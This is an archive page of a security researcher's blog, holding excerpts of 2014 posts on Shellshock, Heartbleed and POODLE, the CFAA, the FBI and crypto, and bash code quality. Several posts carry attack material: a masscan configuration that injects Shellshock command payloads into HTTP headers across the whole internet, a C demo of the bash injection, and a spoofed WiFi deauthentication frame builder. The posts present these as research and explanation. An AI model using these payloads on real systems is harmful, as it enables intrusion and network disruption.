
Author Archives: Robert Graham

Review: The Peripheral, by William Gibson

After four years, William Gibson is finally coming out with a new book, “The Peripheral”. Time to preorder now. http://www.amazon.com/gp/product/B00INIXKV2

There’s not much to review. If you like Gibson’s work, you’ll like this book. (Also, if you don't like Gibson's work, then you are wrong).

What I like about Gibson’s work is his investment in the supporting characters, who are often more interesting than the main characters. Each has a complex backstory, but more importantly, each has a story that unfolds during the book. It’s as if Gibson takes each minor character and writes a short story for them, where they grow and evolve, then combines them all into the main story. It’s a little confusing at the start, because it’s sometimes hard to identify which are the main characters, but it pays off in the end. (I experienced that in this book: among the numerous characters he introduced at the start, it was the least interesting ones who turned out to be the main characters -- not that they were boring, but that they took longer to develop.)

One departure from his normal work is that this book is maybe a little more autobiographical. Continue reading

The FBI’s statements are Orwellian

Recently, FBI Director James Comey gave a speech at the Brookings Institution decrying crypto. It was transparently Orwellian, arguing for a police state. In this post, I'll demonstrate why, quoting bits of the speech.


"the FBI has a sworn duty to keep every American safe from crime and terrorism"
"The people of the FBI are sworn to protect both security and liberty"

This is not true. The FBI's oath is to "defend the Constitution". Nowhere in the oath does it say "protect security" or "keep people safe".

This detail is important. Tyrants suppress civil liberties in the name of national security and public safety. The oath, taken by FBI agents, military personnel, and even the president, is designed to prevent such tyrannies.

Comey repeatedly claims that FBI agents both understand their duty and are committed to it. That Comey himself misunderstands his oath disproves both assertions. This reinforces our belief that FBI agents do not see their duty as protecting our rights, but instead see rights as an impediment in pursuit of some other duty.


Freedom is Danger

The book 1984 describes the concept of "doublethink", with political slogans as examples: "War is Peace", "Ignorance is Strength", and Continue reading

Some POODLE notes

Heartbleed and Shellshock allowed hacks against servers (meaning websites and such). POODLE allows hacking clients (your web browser and such). If Heartbleed/Shellshock merited a 10, then this attack is only around a 5.

It requires MitM (man-in-the-middle) to exploit. In other words, the hacker needs to be able to tap into the wires between you and the website you are browsing, which is difficult to do. This means you are probably safe from hackers at home, because hackers can't tap backbone links. But, since the NSA can tap into such links, it's probably easy for them. However, when using the local Starbucks or other unencrypted WiFi, you are in grave danger from hackers sitting at the table next to you.

It requires, in almost all cases, JavaScript running in the browser. That's because the attacker needs to MitM thousands of nearly identical connections, most of which fail (each guess at a byte succeeds only about 1 time in 256). There are possibly rare cases where such connections happen on their own (like automated control systems), but JavaScript is nearly a requirement. That means the Twitter app on your iPhone is likely safe, as the attacker can't run JavaScript in the app.

It doesn't hack computers; it cracks encryption, revealing previously encrypted data.

Continue reading

Standards are a farce

Today (October 14) is "World Standards Day", celebrating the founding of the ISO, the International Organization for Standardization. It's a good time to point out that people are wrong about standards.

You are reading this blog post via "Internet standards". It's important to note that through its early existence, the Internet was officially not a standard. Through the 1980s, the ISO was busy standardizing a competing set of internetworking standards (OSI).

What made the Internet different is that its standards were de facto, not de jure. In other words, the Internet standards body, the IETF, documented things that worked, not how they should work. Whenever somebody came up with a new protocol to replace an old one, and people started using it, the IETF would document it as "something people are using". Protocols were documented so that others could interoperate with them if they wanted, but there was no claim that they should. Internet evolution in those times was driven by rogue individualism -- people rushed to invent new things without waiting for the standards body to catch up.

The ISO's approach was different. Instead of individualism, it was based on "design by committee", where committees were Continue reading

Don’t sign that CFAA petition

This White House petition reforming the CFAA/DMCA is foolish. Don't sign it.

The problem is that "reform" means nothing. The petition doesn't state exactly which reforms the petitioners want. That means politicians can deliver on what was asked, reforming the DMCA/CFAA, but in the opposite direction. The mood in Washington D.C. is one of great fear of Chinese hackers and cyberterrorists. Once you start reform, these forces will take over and drive it the other way.

In other words, the petition is like somebody on a submarine saying "the air is stuffy, let's open a window and let some fresh air in". It's better to keep that window closed than to drown.

A second problem is the declaration that "safe code" is the problem. That will encourage law-makers to solve that problem with legislation requiring manufacturers to follow rules -- without needing to weaken the DMCA/CFAA. This is bad. So far, rule-based security regimes like Common Criteria and PCI certification have proven to be an enormous burden that does little to address the problem.

Lastly, there is the problem that this is a "White House" petition. The president doesn't make laws, s/he enforces them. It's appropriate to petition the White House Continue reading

Response to Kathy Sierra

People are asking me about this post from Kathy Sierra. It’s inaccurate, twisted, and personally insulting. That Kathy was doxxed and harassed 7 years ago is indeed an awful thing, but that doesn’t justify her own bad behavior toward others.

I always defend targets of lynch mobs, such as accused Boston Bomber Dzhokhar Tsarnaev. To the right is a picture of what appears to be Tsarnaev placing the bomb right behind 8-year-old Martin Richard, who died in the blast. I feel sick to my stomach looking at it. But here’s the thing: Tsarnaev is an American citizen, and I will vigorously defend his right to due process. When they violated his civil rights, interrogating him for days while he hung near death in his hospital bed, begging for a lawyer, I vocally condemned this. All fruits of that interrogation need to be thrown out, even if it means Tsarnaev goes free. And I have no problem saying this to the face of Martin Richard’s parents.

Weev may be a bad human being, but he’s not as vile as a mass bomber. I likewise defend him from lynch mobs. His arbitrary conviction and imprisonment under the CFAA was a gross Continue reading

Wget off the leash

As we all know, to grab a website with wget, we use the "-r" option to "recurse" through all the links. There is also the '-H' option, which means that wget won't restrict itself to just one host. In other words, with '-r -H' together, it'll try to spider the entire Internet. So I did that to see what would happen.

Well, for a 32-bit process, what happened is that after more than a month, it ran out of memory. It maintains an ever-growing list of URLs that it still has to visit, which can easily run into the millions. At a hundred bytes per URL and 2 gigabytes of virtual memory, it'll run out of memory after about 20 million URLs -- far short of the billions on the net. That's what you see below, where 'wget' has crashed after exhausting memory. Below that I show the command I used to launch the process, starting at cnn.com as the seed with a max timeout of 5 seconds.



How much data did I download from the Internet? According to 'du', the answer is 18 gigabytes, as seen in the following screenshot:



It reached 79425 individual domains, far short of the millions it held Continue reading

Six-month anniversary scan for Heartbleed

I just launched my six-month anniversary scan for Heartbleed. I'll start reporting early results tomorrow afternoon. I'm dialing the scan to run slowly and spreading it across four IP addresses (and 32k ports) in order to avoid unduly alarming people.

If you would like the results of the scan for your subnet, send your address ranges to our "abuse@" email address. We'll look up the abuse contact email for those ranges and send you what we found for that range. (This offer is good through the end of October 2014).



Here is a discussion of the options.

--conf /etc/masscan/masscan.conf
You don't see this option, but it's the default. This is where we have the 'excluderanges' configured. Because we exclude everyone who contacts us and "opts out" of our white-hat scans, we are down to scanning only 3.5 billion hosts now, out of around 4 billion.

0.0.0.0/0
The "/0" means "the entire Internet". Actually, any valid IPv4 address can replace the 0.0.0.0 and it'll produce the same results, such as "127.0.0.0/0" to amuse your friends.

-p443
This says to scan on port 443, the default SSL port. At some point in Continue reading

Who named “shellshock”?

Because it's terribly important to cybersec, many are debating the origin of the name "shellshock". I thought I'd write up the definitive answer.

The answer is that it came from this tweet by Andreas Lindh. That's the absolute origin of the term. Andreas made it up himself.



Also, to some extent Davi Ottenheimer deserves some credit for starting the conversation among a bunch of people with his tweet saying "it's not big until there's a logo". Lots of people posted logos at that point.

Also, to some extent, I deserve some credit for then pimping the "shellshock" name in my blogposts, which received a lot of attention in the early hours of the crisis, as you can see from the pageview stats below. Also, most of the early news stories on "real" news websites referenced me and my posts. Those news sites got the name from me, and I got it from Andreas and nobody else.



I suspect what really helped it along is that when I scanned the Internet for the bug, I put it in everybody's webserver logs. I included a pointer to the "shellshock scan" post in the Continue reading

Understanding the HP split

HP is splitting itself into "enterprise" and "consumer" companies. Why the split? Isn't the goal of big companies to get bigger? Well, no, that's just the cynical view of companies. The actual goal is to deliver value to stockholders. Splitting delivers value in two ways. The first is that it "exposes" the underlying business. The second is that it avoids dis-economies of scale.

Conglomerates like GE (General Electric) have a problem. While some businesses do well and grow, other businesses fail and shrink. You can't buy stock in just the individual components of GE's business you think are growing; you have to take all or none. GE Medical has been growing fast, but you can't invest in it individually.

Thus, big companies frequently spin out such companies, either to divest themselves of the dead weight that isn't growing, or conversely, to let a growing part of the business fly free without being held back by the dead weight. The fast-growing parts of a business aren't inherently better. They tend to also be riskier, meaning that while their stock may surge, they are just as likely to go bankrupt soon.

We can see how this philosophy worked in the case of HP's Continue reading

Two Minutes of Hate: Marriott deauthing competing WiFi

Do you stand for principle -- even when it's against your interests? Would you defend the free-speech rights of Nazis, for example? The answer is generally "no"; few people stand for principle. We see that in this morning's news story about Marriott jamming (actually deauthing) portable WiFi hotspots in order to force customers to use their own high-priced WiFi.

The principle I want to discuss here is "arbitrary and discriminatory enforcement". It was the principle behind the Aaron Swartz and Andrew "weev" Auernheimer cases. The CFAA is a vague law where it is impossible to distinguish between allowed and forbidden behavior. Swartz and Weev were prosecuted under the CFAA not because what they did was "unauthorized access", but because they pissed off the powerful. Prosecutors then interpreted the law to suit their purposes.


The same thing is true in the Marriott case. Deauthing WiFi is common practice on large campuses everywhere: company headquarters, hospitals, and colleges. They do this for security reasons, to prevent rogue access-points from opening up holes behind the firewall. It's also used at the DefCon conference, to prevent hostile access-points from tricking people by using "DefCon" in their name.
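To make "deauthing" concrete, here's a minimal sketch of what an 802.11 deauthentication frame looks like on the wire. The struct layout follows the 802.11 standard, but the builder function and its names are hypothetical, written just for illustration: a deauth system forges these management frames with the access point's address as the sender, so the victim's client obediently drops its connection.

#include <stdint.h>
#include <string.h>

/* Sketch of an 802.11 deauthentication (management) frame.
 * The field layout follows the 802.11 standard; build_deauth() and
 * its names are hypothetical, for illustration only. */
#pragma pack(push, 1)
struct deauth_frame {
    uint8_t frame_control[2]; /* 0xC0 0x00 = management frame, subtype "deauthentication" */
    uint8_t duration[2];
    uint8_t dst[6];           /* the client being kicked off */
    uint8_t src[6];           /* spoofed: the access point's MAC */
    uint8_t bssid[6];         /* the access point's MAC again */
    uint8_t seq_ctrl[2];
    uint8_t reason_code[2];   /* e.g. 7 = "class 3 frame from nonassociated station" */
};
#pragma pack(pop)

/* Fill in a deauth frame kicking 'client' off the network, pretending
 * the frame came from access point 'ap'. */
static void build_deauth(struct deauth_frame *f,
                         const uint8_t client[6], const uint8_t ap[6])
{
    memset(f, 0, sizeof(*f));
    f->frame_control[0] = 0xC0;   /* management / deauthentication */
    memcpy(f->dst, client, 6);
    memcpy(f->src, ap, 6);
    memcpy(f->bssid, ap, 6);
    f->reason_code[0] = 7;        /* reason code, little-endian */
}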

Section 333 of the Communications Continue reading

Opt-in for upcoming Heartbleed results

On October 8, the 6-month anniversary of Heartbleed, I'm going to scan the Internet again for it. I expect to find that about 250k devices are still vulnerable. These are things like webcams, NAS boxes, forgotten VM instances, development machines, and so on -- few real "web servers" will be vulnerable.

I will, of course, exclude from my scan everyone who has asked to be excluded. My scan list is down to only 3.5 billion hosts because of all the exclusions I do. However, asking whitehats to exclude you from their scans is not a smart security strategy. Therefore, if you are on our exclude list, I suggest you do the reverse: opt back in.

I mention this because we are going to try something new: allow people to opt-in to the results. Send us an email, and we'll send the results of our Heartbleed scan for your address range to the "abuse" address registered for that address range.

Reading the Silk Road configuration

Many of us believe it wasn't the FBI who discovered the hidden Silk Road server, but the NSA (or another intelligence organization). We believe the FBI is using "parallel construction": creating a plausible story of how they found the server to satisfy the courts -- a story that isn't true.

Today, Brian Krebs released data from the defense team that seems to confirm the "parallel construction" theory. I thought I'd write up a technical discussion of what was found.

The Tarbell declaration


A month ago, the FBI released a statement from the lead investigator, Christopher Tarbell, describing how he discovered the hidden server ("the Tarbell declaration"). This document had four noticeable defects.

The first is that the details are vague. It is impossible for anybody with technical skill (such as myself) to figure out what he did.

The second problem is that some of the details are impossible, such as seeing the IP address in the "packet headers".

Thirdly, he saved none of the forensics data. You'd have thought that had this been real, he would have at least captured packet logs or even screenshots of what he did. I'm a technical blogger. I document this sort Continue reading

Right-winger explains what’s wrong with ComputerCop

The EFF has a good article on ComputerCop. Police departments have lashed back, saying the EFF is an "ultra-liberal organization that is not in any way credible on this". While it's true the EFF is a bunch of leftists, I'm a right-winger -- and I agree with them in this case. Maybe they'll find my right-wing criticisms of ComputerCop more believable.


The basic issue is that this program isn't "protection", but is instead a "virus". It's the same software hackers use to spy on computers. It's the same software that jealous lovers secretly install on their partner's computer. Some of the copies the police give out will be used for the intended purpose (parents hacking their children's computers), but some copies will end up in the hands of evil-doers who use it for hacking. When investigating domestic abuse cases over the next few years, police will find their own software on victims' computers, placed there by the abusers.

Monitoring your child's online activities is a good thing. Hacking your child's computers is probably a bad thing. It's not the sort of activity police departments should be encouraging.

The software maker exploits the fact that rural county sheriffs are Continue reading

The shockingly obsolete code of bash

One of the problems with bash is that it's simply obsolete code. We have modern objective standards about code quality, and bash doesn't meet those standards. In this post, I'm going to review the code, starting with the function that is at the heart of the #shellshock bug, initialize_shell_variables().

K&R function headers


The code uses K&R function headers, which have been obsolete since the mid-1980s.
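For readers who haven't seen the old style, here's a sketch of the difference. The function below is hypothetical, not copied from the bash source: in the K&R form, parameter types are declared after the parameter list, so the compiler cannot check that callers pass the right arguments.

/* K&R style, as used throughout bash (the function here is hypothetical,
 * for illustration): parameter types are declared separately, so the
 * compiler does no checking of arguments at call sites. */
char *
lookup_value_old (table, name)
     char **table;
     char *name;
{
    return table && name ? table[0] : 0;
}

/* The same thing in modern prototype style (ANSI C89 and later): the
 * compiler and static-analysis tools can now verify every call. */
char *lookup_value_new(char **table, char *name)
{
    return table && name ? table[0] : 0;
}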


I don't think it's there to support older compilers, because other parts of the code use modern headers. I think it's there simply because they are paranoid about making unnecessary changes to the code. The effect of this is that it messes up static analysis, both simple compiler warnings and advanced security analysis tools.

It's also a stylistic issue. There's only one rule to coding style, which is "avoid surprising things", and this is surprising.

Ultimately, this isn't much of an issue in itself, but it's a symptom that something is seriously wrong with this code.

Global variables everywhere


Global variables are bad. Your program should have a maximum of five, for such things as the global debug or logging flag. Bash has hundred(s) of global variables.
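A hedged illustration of the difference (the variable names below are invented, not taken from the bash source): one or two well-known flags are easy to reason about, but when dozens of pieces of interrelated state live in globals, any function can silently change any of them, which defeats both human review and static analysis.

/* Acceptable: a handful of process-wide flags. */
int debug_flag = 0;            /* e.g. turned on by a -x style option */

/* The pattern the post complains about (names invented for illustration):
 * interrelated parser and shell state held in globals, mutated from anywhere. */
int   parser_state = 0;
int   expansion_depth = 0;
char *current_token = 0;
/* ...imagine hundreds more... */

/* Any function, anywhere, can silently change global behavior: */
void handle_input(const char *line)
{
    (void)line;
    if (debug_flag)
        parser_state = 0;      /* a side effect invisible at the call site */
}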


Also note that a large number of Continue reading

Do shellshock scans violate CFAA?

In order to measure the danger of the bash shellshock vulnerability, I scanned the Internet for it. Many are debating whether this violates the CFAA, the anti-hacking law.

The answer is that everything technically violates that law. The CFAA is vaguely written, allowing discriminatory prosecution by the powerful, such as when 'weev' was prosecuted for downloading iPad account information that AT&T had made public on its website. Such laws need to be challenged, but sadly, those doing the challenging tend to be the evil sort, like child molesters, terrorists, and Internet trolls like weev. A better way to challenge the law is with a more sympathetic character. Being a good guy defending websites still doesn't justify unauthorized access (if indeed it's unauthorized), but it'll give credence to the argument that the law is unconstitutionally vague, because I'm obviously not trying to "get away with something".


Law is like code. The code says (paraphrased):
intentionally accesses the computer without authorization thereby obtaining information
There are two vague items here, "intentionally" and "authorization". (The "access" and "information" are also vague, but we'll leave that for later).
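Taking "law is like code" literally, here's my own sketch of that clause as a function (it illustrates the vagueness argument; it is not a quotation of the statute). Two of its inputs, "intentionally" and "authorized", are predicates nobody can evaluate precisely, yet the verdict depends entirely on them.

#include <stdbool.h>

/* The CFAA clause paraphrased above, rendered as code -- my sketch,
 * for illustration, not a legal statement. */
bool violates_cfaa(bool intentionally,      /* vague: what counts as intent? */
                   bool accesses_computer,  /* also vague, as noted above */
                   bool authorized,         /* vague: who grants authorization? */
                   bool obtains_information)
{
    return intentionally
        && accesses_computer
        && !authorized
        && obtains_information;
}

Feed a shellshock scan into this function: the scanner certainly acts intentionally and obtains banner information, so the verdict turns entirely on "authorized" -- the one input the law never defines.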


The problem with the law is that it was written in the 1980s before the web Continue reading

Many eyes theory conclusively disproven

Just because a bug was found in open-source code does not disprove the "many eyes" theory. What disproves it is that these bugs are being found now, when they should've been found sometime in the last 25 years.

Many eyes are obviously looking at bash now, and they are finding fairly obvious problems. It's obvious that the parsing code in bash is deeply flawed, though any particular bug isn't so obvious. If many eyes had been looking at bash over the past 25 years, these bugs would've been found a long time ago.

Thus, we know that "many eyes" haven't been looking at bash.

The theory is the claim, promoted by open-source advocates, that "many eyes make bugs shallow" -- that open-source will have fewer bugs (and fewer security problems) since anyone can look at the code.

What we've seen is that, in fact, very few people ever read code, even when it's open-source. The average programmer writes 10x more code than they read. The only people for whom that equation is reversed are professional code auditors -- and they are hired primarily to audit closed-source code. Companies like Microsoft pay programmers to review code because reviewing code is not otherwise something programmers like to do.

From Continue reading

Shellshock is 20 years old (get off my lawn)

The bash issue is 20 years old. By this I don't mean the actual bug is that old (though it appears it might be), but that we've known for that long that passing HTTP values to shell scripts is a bad idea.
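The reason it's a bad idea is mechanical: the CGI convention copies HTTP request values (User-Agent, Cookie, and so on) into environment variables before running the handler, and a vulnerable bash executes code smuggled into any environment variable that looks like an exported function definition. Here's a minimal sketch of that plumbing -- not code from any real web server; on a patched bash the smuggled command simply doesn't run.

#include <stdio.h>
#include <stdlib.h>

/* Minimal demonstration of why passing HTTP values to shell scripts is
 * dangerous: a header value is copied verbatim into an environment
 * variable (as CGI does), then a bash handler is launched.
 * On an unpatched bash, the command after the function definition runs. */
int main(void)
{
    /* Pretend this arrived in the User-Agent header of a request. */
    const char *header_value = "() { :; }; echo VULNERABLE";

    setenv("HTTP_USER_AGENT", header_value, 1);

    /* The web server hands off to a shell, as a CGI gateway would. */
    return system("/bin/bash -c 'echo handling request'");
}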

My first experience with this was in 1995. I worked for "Network General Corporation" (which would later merge with McAfee Associates). At the time, about 1000 people worked for the company. We made the Sniffer, the original packet-sniffer that gave its name to the entire class of products.

One day, the head of IT comes to me with an e-mail from some unknown person informing us that our website was vulnerable. He was in standard denial, asking me to confirm that "this asshole is full of shit".

But no, whoever had sent us the email was correct, and obviously so. I was enough of a security expert that our IT guy would come to me, yet I hadn't considered that bug before (to my great embarrassment). Of course, one glance at the email and I knew it was true. I didn't have to try it out on our website, because it was self-evident in the way that Continue reading

Bash ‘shellshock’ bug is wormable

Early results from my scan: there are about 3000 systems vulnerable just on port 80, just on the root "/" URL, without the Host field. That doesn't sound like a lot, but that's not where the bug lives. Update: oops, my scan broke early in the process and stopped capturing the responses -- it's probably a lot more responses than that.

Firstly, only about 1 in 50 webservers respond correctly without the proper Host field. Scanning with the correct domain names would lead to a lot more results -- about 50 times more.

Secondly, it's things like CGI scripts that are vulnerable, deep within a website (like CPanel's /cgi-sys/defaultwebpage.cgi). Getting just the root page is the thing least likely to be vulnerable. Spidering the site, and testing well-known CGI scripts (like the CPanel one) would give a lot more results, at least 10x.

Thirdly, it's embedded webservers on odd ports that are the real danger. Scanning more ports would give a couple times more results.

Fourthly, it's not just web, but other services that are vulnerable, such as the DHCP service reported in the initial advisory.

Consequently, even though my light scan found only 3000 results, this thing is clearly Continue reading

Bash ‘shellshock’ scan of the Internet

NOTE: malware is now using this as its User-agent. I haven't run a scan for over two days.

I'm running a scan right now of the Internet to test for the recent bash vulnerability, to see how widespread this is. My scan works by stuffing a bunch of "ping home" commands in various CGI variables. It's coming from IP address 209.126.230.72.

The configuration file for masscan looks something like:

target-ip = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

(Actually, these last three options don't quite work due to a bug, so you have to manually add them to the code https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120)

Some earlier testing shows that this bug is widespread.
A discussion of the results is at the next blogpost here. The upshot is this: while this scan found only a few thousand systems (because it's intentionally limited), it looks like the potential for a worm is high.